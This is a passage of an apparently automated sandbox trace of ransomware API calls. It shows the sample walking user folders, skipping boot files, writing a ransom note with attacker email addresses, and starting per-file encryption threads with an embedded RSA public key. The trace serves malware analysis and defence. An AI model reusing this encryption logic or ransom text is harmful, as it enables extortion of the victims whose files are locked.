out: lpFindFileData=0x17e3c0) returned 1 [0258.840] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0258.840] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0258.841] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0258.841] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0258.841] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0258.841] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0 [0258.841] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 1 [0258.841] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 0 [0258.841] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0258.841] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\*.*") returned="C:\\Users\\Default\\*.*" [0258.841] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="Desktop") returned 0x0 [0258.841] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="DESKTOP") returned 0x0 [0258.841] SetErrorMode (uMode=0x1) returned 0x1 [0258.841] wsprintfW (in: param_1=0x17d57c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\_HELP_INSTRUCTION.TXT") returned 38 [0258.841] GetUserNameW (in: lpBuffer=0x17b358, pcbBuffer=0x17b144 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17b144) returned 1 [0258.841] wsprintfW (in: param_1=0x17b150, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0258.841] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17b14c | out: phkResult=0x17b14c*=0x14cc) returned 0x0 [0258.841] RegQueryValueExW (in: hKey=0x14cc, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43e3f30, lpcbData=0x17b148*=0x104 | out: lpType=0x0, lpData=0x43e3f30*=0x65, lpcbData=0x17b148*=0x4a) returned 0x0 [0258.841] RegCloseKey (hKey=0x14cc) returned 0x0 [0258.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17c57c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0258.841] wsprintfW (in: param_1=0x17b57c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0258.841] CreateFileW (lpFileName="C:\\Users\\Default\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0258.842] CreateFileW (lpFileName="C:\\Users\\Default\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0258.842] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x3cdea18 [0258.842] PathFindFileNameW (pszPath="C:\\Users\\Default") returned="Default" [0258.842] lstrcpyW (in: lpString1=0x17d784, lpString2="Default" | out: lpString1="Default") returned="Default" [0258.842] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0258.842] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0258.842] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="AppData" | out: lpString1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0258.842] SetErrorMode (uMode=0x1) returned 0x1 [0258.842] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\AppData" | out: lpString1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0258.842] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0258.842] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\AppData\\" | out: lpString1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0258.842] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\AppData\\*.*") returned="C:\\Users\\Default\\AppData\\*.*" [0258.842] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0258.842] PathFindFileNameW (pszPath="C:\\Users\\Default\\AppData") returned="AppData" [0258.842] lstrcpyW (in: lpString1=0x17c6e4, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0258.842] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\AppData" | out: lpString1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0258.842] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\AppData\\*.*") returned="C:\\Users\\Default\\AppData\\*.*" [0258.842] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="Desktop") returned 0x0 [0258.842] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="DESKTOP") returned 0x0 [0258.842] SetErrorMode (uMode=0x1) returned 0x1 [0258.842] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\AppData\\_HELP_INSTRUCTION.TXT") returned 46 [0258.842] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0258.843] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0258.843] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x14d0) returned 0x0 [0258.843] RegQueryValueExW (in: hKey=0x14d0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43e4160, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43e4160*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0258.843] RegCloseKey (hKey=0x14d0) returned 0x0 [0258.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0258.843] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0258.843] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\appdata\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0258.843] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\appdata\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0258.843] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0258.843] PathFindFileNameW (pszPath="C:\\Users\\Default\\AppData") returned="AppData" [0258.843] lstrcpyW (in: lpString1=0x17c6e4, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0258.843] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0258.843] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0258.843] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Application Data" | out: lpString1="C:\\Users\\Default\\Application Data") returned="C:\\Users\\Default\\Application Data" [0258.843] SetErrorMode (uMode=0x1) returned 0x1 [0258.843] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Application Data" | out: lpString1="C:\\Users\\Default\\Application Data") returned="C:\\Users\\Default\\Application Data" [0258.844] lstrcatW (in: lpString1="C:\\Users\\Default\\Application Data", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Application Data\\") returned="C:\\Users\\Default\\Application Data\\" [0258.844] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Application Data\\" | out: lpString1="C:\\Users\\Default\\Application Data\\") returned="C:\\Users\\Default\\Application Data\\" [0258.844] lstrcatW (in: lpString1="C:\\Users\\Default\\Application Data\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Application Data\\*.*") returned="C:\\Users\\Default\\Application Data\\*.*" [0258.844] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Application Data\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0258.844] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0258.844] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Application Data" | out: lpString1="C:\\Users\\Default\\Application Data") returned="C:\\Users\\Default\\Application Data" [0258.844] lstrcatW (in: lpString1="C:\\Users\\Default\\Application Data", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Application Data\\*.*") returned="C:\\Users\\Default\\Application Data\\*.*" [0258.844] StrStrW (lpFirst="C:\\Users\\Default\\Application Data\\", lpSrch="Desktop") returned 0x0 [0258.844] StrStrW (lpFirst="C:\\Users\\Default\\Application Data\\", lpSrch="DESKTOP") returned 0x0 [0258.844] SetErrorMode (uMode=0x1) returned 0x1 [0258.844] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Application Data\\_HELP_INSTRUCTION.TXT") returned 55 [0258.844] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0258.844] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0258.844] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x14d0) returned 0x0 [0258.844] RegQueryValueExW (in: hKey=0x14d0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43e4390, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43e4390*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0258.844] RegCloseKey (hKey=0x14d0) returned 0x0 [0258.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0258.844] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0258.844] CreateFileW (lpFileName="C:\\Users\\Default\\Application Data\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\application data\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0258.845] CreateFileW (lpFileName="C:\\Users\\Default\\Application Data\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\application data\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0258.845] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Application Data\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0258.845] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0258.845] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0258.845] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0258.845] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0258.845] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0258.845] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0258.845] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Contacts" | out: lpString1="C:\\Users\\Default\\Contacts") returned="C:\\Users\\Default\\Contacts" [0258.845] SetErrorMode (uMode=0x1) returned 0x1 [0258.845] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Contacts" | out: lpString1="C:\\Users\\Default\\Contacts") returned="C:\\Users\\Default\\Contacts" [0258.845] lstrcatW (in: lpString1="C:\\Users\\Default\\Contacts", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Contacts\\") returned="C:\\Users\\Default\\Contacts\\" [0258.845] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Contacts\\" | out: lpString1="C:\\Users\\Default\\Contacts\\") returned="C:\\Users\\Default\\Contacts\\" [0258.845] lstrcatW (in: lpString1="C:\\Users\\Default\\Contacts\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Contacts\\*.*") returned="C:\\Users\\Default\\Contacts\\*.*" [0258.845] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Contacts\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0258.845] PathFindFileNameW (pszPath="C:\\Users\\Default\\Contacts") returned="Contacts" [0258.845] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Contacts" | out: lpString1="Contacts") returned="Contacts" [0258.845] StrStrW (lpFirst="Administrator.contact", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0258.845] StrStrW (lpFirst="Administrator.contact", lpSrch="ntldr") returned 0x0 [0258.845] StrStrW (lpFirst="Administrator.contact", lpSrch="NTLDR") returned 0x0 [0258.845] StrStrW (lpFirst="Administrator.contact", lpSrch="NTDETECT.COM") returned 0x0 [0258.845] StrStrW (lpFirst="Administrator.contact", lpSrch="ntdetect.com") returned 0x0 [0258.845] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="Desktop") returned 0x0 [0258.846] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0258.846] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Contacts\\") returned 30 [0258.846] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0258.846] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Administrator.contact" | out: lpString1="Administrator.contact") returned="Administrator.contact" [0258.846] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\") returned="\\\\?\\C:\\Users\\Default\\Contacts\\" [0258.846] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x14d4 [0258.846] Sleep (dwMilliseconds=0x96) [0258.996] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0258.996] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0258.996] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0258.996] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0258.997] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0258.997] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0258.997] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0258.997] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0258.997] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="Desktop") returned 0x0 [0258.997] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0258.997] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Contacts\\") returned 30 [0258.997] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0258.997] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0258.997] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\") returned="\\\\?\\C:\\Users\\Default\\Contacts\\" [0258.997] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x14d8 [0258.997] Sleep (dwMilliseconds=0x96) [0259.152] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0259.152] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 1 [0259.152] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0259.153] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Contacts" | out: lpString1="C:\\Users\\Default\\Contacts") returned="C:\\Users\\Default\\Contacts" [0259.153] lstrcatW (in: lpString1="C:\\Users\\Default\\Contacts", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Contacts\\*.*") returned="C:\\Users\\Default\\Contacts\\*.*" [0259.153] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="Desktop") returned 0x0 [0259.153] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0259.153] SetErrorMode (uMode=0x1) returned 0x1 [0259.153] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Contacts\\_HELP_INSTRUCTION.TXT") returned 47 [0259.153] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0259.153] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0259.153] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x14dc) returned 0x0 [0259.153] RegQueryValueExW (in: hKey=0x14dc, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43e45c0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43e45c0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0259.153] RegCloseKey (hKey=0x14dc) returned 0x0 [0259.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0259.153] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0259.153] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\contacts\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0259.153] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\contacts\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0259.153] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Contacts\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0259.154] PathFindFileNameW 